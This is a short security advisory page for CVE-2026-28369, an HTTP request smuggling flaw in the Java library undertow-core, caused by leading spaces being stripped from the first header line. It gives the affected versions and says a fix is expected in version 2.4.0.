Aikido Intel
Secure My Code
Intel

AIKIDO-2026-10534

undertow-core is vulnerable to Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')

Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')CVE-2026-28369 Published Apr 24, 2026

87

High Risk

This Affects:

JAVAundertow-core
0.0.1 - 2.3.24.Final
Are you affected? Scan for Free

TL;DR

A flaw was found in Undertow where an HTTP request with a first header line starting with one or more spaces is incorrectly processed by stripping the leading spaces. This violation of HTTP standards can be exploited by a remote attacker to perform HTTP request smuggling, allowing them to bypass security mechanisms, manipulate web caches, or access restricted information.

Who does this affect?

You are affected if you are using a version that falls within the vulnerable range.

Background info

undertow-core is vulnerable to Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') in versions 0.0.1 - 2.3.24.Final.

How to fix this

There is no fix available yet, but there are PRs ready to merge and the fix will probably be released in version 2.4.0.

Links

Are You Affected?

Connect your repositories to instantly see whether vulnerable or malicious packages exist in your codebase.

Scan for Free
Book a Demo

Free. No credit card required.

Aikido Platform
Subscribe
Stay up to date with all updates
LinkedIn YouTube X
© 2026 Aikido Security BV | BE0792914919
Ghent, Belgium | San Francisco, US
SOC 2SOC 2Compliant
ISO 27001ISO 27001Compliant
Get Security Done